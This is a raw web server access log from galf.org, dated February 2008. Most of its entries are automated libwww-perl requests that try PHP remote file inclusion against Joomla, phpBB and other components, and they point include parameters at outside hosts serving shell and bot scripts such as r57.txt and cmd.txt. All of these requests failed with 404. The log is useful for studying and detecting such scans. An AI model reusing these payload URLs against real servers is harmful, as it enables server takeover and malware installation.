150.164.211.202 - - [24/Feb/2008:16:00:20 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ownar.xpg.com.br/bot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.118.85.129 - - [24/Feb/2008:16:00:51 -0800] "GET /logs/access_070917.log/index.php?go=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.118.85.129 - - [24/Feb/2008:16:00:51 -0800] "GET /index.php?go=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.118.85.129 - - [24/Feb/2008:16:00:51 -0800] "GET /logs/index.php?go=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.65.40.218 - - [24/Feb/2008:16:01:00 -0800] "GET /logs/access.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
69.65.40.218 - - [24/Feb/2008:16:01:00 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
69.65.40.218 - - [24/Feb/2008:16:01:00 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
87.230.81.116 - - [24/Feb/2008:16:01:03 -0800] "GET /logs/access_070917.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.81.116 - - [24/Feb/2008:16:01:03 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.81.116 - - [24/Feb/2008:16:01:03 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.146.119.47 - - [24/Feb/2008:16:01:13 -0800] "GET /logs/access.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://yugifire.t35.com/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
200.146.119.47 - - [24/Feb/2008:16:01:14 -0800] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://yugifire.t35.com/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
200.146.119.47 - - [24/Feb/2008:16:01:14 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://yugifire.t35.com/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
85.25.61.101 - - [24/Feb/2008:16:01:30 -0800] "GET /logs/access_070917.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.61.101 - - [24/Feb/2008:16:01:30 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.61.101 - - [24/Feb/2008:16:01:30 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.127.86.135 - - [24/Feb/2008:16:02:53 -0800] "GET /logs/access.log/main.php?x=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
216.127.86.135 - - [24/Feb/2008:16:02:53 -0800] "GET /main.php?x=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
216.127.86.135 - - [24/Feb/2008:16:02:54 -0800] "GET /logs/main.php?x=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
69.65.40.218 - - [24/Feb/2008:16:03:02 -0800] "GET /logs/access_070917.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.65.40.218 - - [24/Feb/2008:16:03:02 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.65.40.218 - - [24/Feb/2008:16:03:02 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.214.57.24 - - [24/Feb/2008:16:03:09 -0800] "GET /logs/access.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
85.214.57.24 - - [24/Feb/2008:16:03:09 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
74.4.20.46 - - [24/Feb/2008:16:04:57 -0800] "GET /index.php3?p=http://scanbax.we.bs/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.4.20.46 - - [24/Feb/2008:16:05:06 -0800] "GET /index.php3?p=http://scanbax.we.bs/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.246.32.129 - - [24/Feb/2008:16:05:17 -0800] "GET /logs/access.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
216.246.32.129 - - [24/Feb/2008:16:05:17 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
216.246.32.129 - - [24/Feb/2008:16:05:17 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
83.172.144.57 - - [24/Feb/2008:16:05:36 -0800] "GET /logs/access.log/send_reminders.php?includedir=http://wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
83.172.144.57 - - [24/Feb/2008:16:05:36 -0800] "GET /logs/send_reminders.php?includedir=http://wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
85.214.57.24 - - [24/Feb/2008:16:05:46 -0800] "GET /logs/access_070917.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.57.24 - - [24/Feb/2008:16:05:46 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.57.24 - - [24/Feb/2008:16:05:46 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.246.32.129 - - [24/Feb/2008:16:07:20 -0800] "GET /logs/access_070917.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.246.32.129 - - [24/Feb/2008:16:07:20 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.246.32.129 - - [24/Feb/2008:16:07:20 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.187.94.179 - - [24/Feb/2008:16:08:06 -0800] "GET /logs///claroline/phpbb/page_tail.php?includePath=http://www.indicce.com/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.22.204.46 - - [24/Feb/2008:16:08:22 -0800] "GET /logs/access_080114.log/index1.php?=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
203.22.204.46 - - [24/Feb/2008:16:08:22 -0800] "GET /index1.php?=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
203.22.204.46 - - [24/Feb/2008:16:08:22 -0800] "GET /logs/index1.php?=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
80.86.84.203 - - [24/Feb/2008:16:08:22 -0800] "GET /logs/access.log/send_reminders.php?includedir=http://wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
80.86.84.203 - - [24/Feb/2008:16:08:23 -0800] "GET /logs/send_reminders.php?includedir=http://wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
222.239.78.91 - - [24/Feb/2008:16:10:28 -0800] "GET /logs/scripts.log/index.php3?p=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
222.239.78.91 - - [24/Feb/2008:16:10:28 -0800] "GET /index.php3?p=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
222.239.78.91 - - [24/Feb/2008:16:10:29 -0800] "GET /logs/index.php3?p=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.111.157.66 - - [24/Feb/2008:16:10:49 -0800] "GET /logs/access_070917.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.111.157.66 - - [24/Feb/2008:16:10:50 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.111.157.66 - - [24/Feb/2008:16:10:50 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.187.94.179 - - [24/Feb/2008:16:11:04 -0800] "GET /logs///claroline/phpbb/page_tail.php?includePath=http://www.indicce.com/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
200.111.157.66 - - [24/Feb/2008:16:13:28 -0800] "GET /logs/access_071014.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.98.28.18 - - [24/Feb/2008:16:15:30 -0800] "GET /logs/access.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
65.98.28.18 - - [24/Feb/2008:16:15:30 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
65.98.28.18 - - [24/Feb/2008:16:15:30 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
81.91.228.154 - - [24/Feb/2008:16:15:40 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
65.98.28.18 - - [24/Feb/2008:16:17:36 -0800] "GET /logs/access_070917.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.28.18 - - [24/Feb/2008:16:17:36 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.98.28.18 - - [24/Feb/2008:16:17:36 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
222.239.78.91 - - [24/Feb/2008:16:18:14 -0800] "GET /logs/access.log/page.php?s=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
222.239.78.91 - - [24/Feb/2008:16:18:15 -0800] "GET /page.php?s=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
222.239.78.91 - - [24/Feb/2008:16:18:15 -0800] "GET /logs/page.php?s=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
71.6.131.4 - - [24/Feb/2008:16:18:51 -0800] "GET /logs/access.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
71.6.131.4 - - [24/Feb/2008:16:18:51 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
71.6.131.4 - - [24/Feb/2008:16:18:51 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
74.4.20.46 - - [24/Feb/2008:16:19:21 -0800] "GET /index.php3?p=http://scanbax.we.bs/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
74.4.20.46 - - [24/Feb/2008:16:19:26 -0800] "GET /index.php3?p=http://scanbax.we.bs/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
85.176.233.117 - - [24/Feb/2008:16:19:35 -0800] "GET /logs/access_070709.loghttp://jinuisryan1918pe.chat.ru/images/mybabyboy? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.galf.org"
190.54.32.131 - - [24/Feb/2008:16:21:05 -0800] "GET /logs/access_071022.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.kool-wallpapers.com//photos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
190.54.32.131 - - [24/Feb/2008:16:21:06 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.kool-wallpapers.com//photos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
222.239.78.91 - - [24/Feb/2008:16:21:10 -0800] "GET /logs/access.log/index.php3?p=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
222.239.78.91 - - [24/Feb/2008:16:21:10 -0800] "GET /index.php3?p=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
222.239.78.91 - - [24/Feb/2008:16:21:11 -0800] "GET /logs/index.php3?p=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
71.6.131.4 - - [24/Feb/2008:16:21:11 -0800] "GET /logs/access_070917.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
71.6.131.4 - - [24/Feb/2008:16:21:11 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
71.6.131.4 - - [24/Feb/2008:16:21:11 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.91.228.154 - - [24/Feb/2008:16:22:11 -0800] "GET /logs/access_070917.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
81.91.228.154 - - [24/Feb/2008:16:22:12 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
70.87.58.146 - - [24/Feb/2008:16:22:47 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.36.241.61 - - [24/Feb/2008:16:24:21 -0800] "GET /logs/access.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
66.36.241.61 - - [24/Feb/2008:16:24:21 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
66.36.241.61 - - [24/Feb/2008:16:24:21 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
196.209.251.3 - - [24/Feb/2008:16:25:15 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
66.132.204.166 - - [24/Feb/2008:16:26:10 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.132.204.166 - - [24/Feb/2008:16:26:10 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.36.241.61 - - [24/Feb/2008:16:26:11 -0800] "GET /logs/access_070917.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.36.241.61 - - [24/Feb/2008:16:26:11 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.36.241.61 - - [24/Feb/2008:16:26:11 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.31.30.226 - - [24/Feb/2008:16:26:56 -0800] "GET /logs/access_070917.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.31.30.226 - - [24/Feb/2008:16:26:56 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.210.29.1 - - [24/Feb/2008:16:27:03 -0800] "GET /logs/access.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
194.210.29.1 - - [24/Feb/2008:16:27:04 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
194.210.29.1 - - [24/Feb/2008:16:27:04 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
194.210.29.49 - - [24/Feb/2008:16:27:05 -0800] "GET /logs/access.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
194.210.29.49 - - [24/Feb/2008:16:27:05 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
194.210.29.49 - - [24/Feb/2008:16:27:06 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
70.87.58.146 - - [24/Feb/2008:16:27:06 -0800] "GET /logs/access_070917.log//modules/agendax/addevent.inc.php?agendax_path=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.87.58.146 - - [24/Feb/2008:16:27:07 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
77.222.131.65 - - [24/Feb/2008:16:27:40 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
77.222.131.65 - - [24/Feb/2008:16:27:48 -0800] "GET /logs/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
194.146.225.160 - - [24/Feb/2008:16:28:02 -0800] "GET /logs/access_070917.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.146.225.160 - - [24/Feb/2008:16:28:02 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.146.225.160 - - [24/Feb/2008:16:28:02 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.234.7.39 - - [24/Feb/2008:16:28:05 -0800] "GET /logs/access.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
89.234.7.39 - - [24/Feb/2008:16:28:05 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
89.234.7.39 - - [24/Feb/2008:16:28:05 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
70.87.58.146 - - [24/Feb/2008:16:28:22 -0800] "GET /logs/access_071014.log//modules/agendax/addevent.inc.php?agendax_path=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
194.210.29.1 - - [24/Feb/2008:16:29:45 -0800] "GET /logs/access_070917.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.210.29.1 - - [24/Feb/2008:16:29:45 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.210.29.1 - - [24/Feb/2008:16:29:46 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.210.29.49 - - [24/Feb/2008:16:29:47 -0800] "GET /logs/access_070917.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.210.29.49 - - [24/Feb/2008:16:29:48 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.210.29.49 - - [24/Feb/2008:16:29:48 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.234.7.39 - - [24/Feb/2008:16:30:00 -0800] "GET /logs/access_070917.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.234.7.39 - - [24/Feb/2008:16:30:00 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.234.7.39 - - [24/Feb/2008:16:30:01 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.197.68.66 - - [24/Feb/2008:16:30:32 -0800] "GET /logs/access.log/index.php?x=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
217.197.68.66 - - [24/Feb/2008:16:30:33 -0800] "GET /index.php?x=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
217.197.68.66 - - [24/Feb/2008:16:30:33 -0800] "GET /logs/index.php?x=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
201.31.30.226 - - [24/Feb/2008:16:30:36 -0800] "GET /logs/access_071014.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.80.120.114 - - [24/Feb/2008:16:34:00 -0800] "GET /logs/access_070917.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.80.120.114 - - [24/Feb/2008:16:34:00 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.80.120.114 - - [24/Feb/2008:16:34:00 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.197.68.66 - - [24/Feb/2008:16:34:06 -0800] "GET /index.php?x=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.91.66.79 - - [24/Feb/2008:16:34:37 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
150.164.211.202 - - [24/Feb/2008:16:35:07 -0800] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ownar.xpg.com.br/bot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
150.164.211.202 - - [24/Feb/2008:16:35:07 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ownar.xpg.com.br/bot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.102.131.114 - - [24/Feb/2008:16:35:16 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
67.195.44.110 - - [24/Feb/2008:16:35:43 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.44.81 - - [24/Feb/2008:16:35:44 -0800] "GET /logs/access_070709.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.234.144.91 - - [24/Feb/2008:16:36:39 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.234.144.91 - - [24/Feb/2008:16:36:39 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.28.156 - - [24/Feb/2008:16:37:42 -0800] "GET /logs/access_071029.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
66.196.43.232 - - [24/Feb/2008:16:37:55 -0800] "GET /logs/access.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
66.196.43.232 - - [24/Feb/2008:16:37:56 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
66.196.43.232 - - [24/Feb/2008:16:37:56 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
194.210.19.129 - - [24/Feb/2008:16:38:10 -0800] "GET /logs/access.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
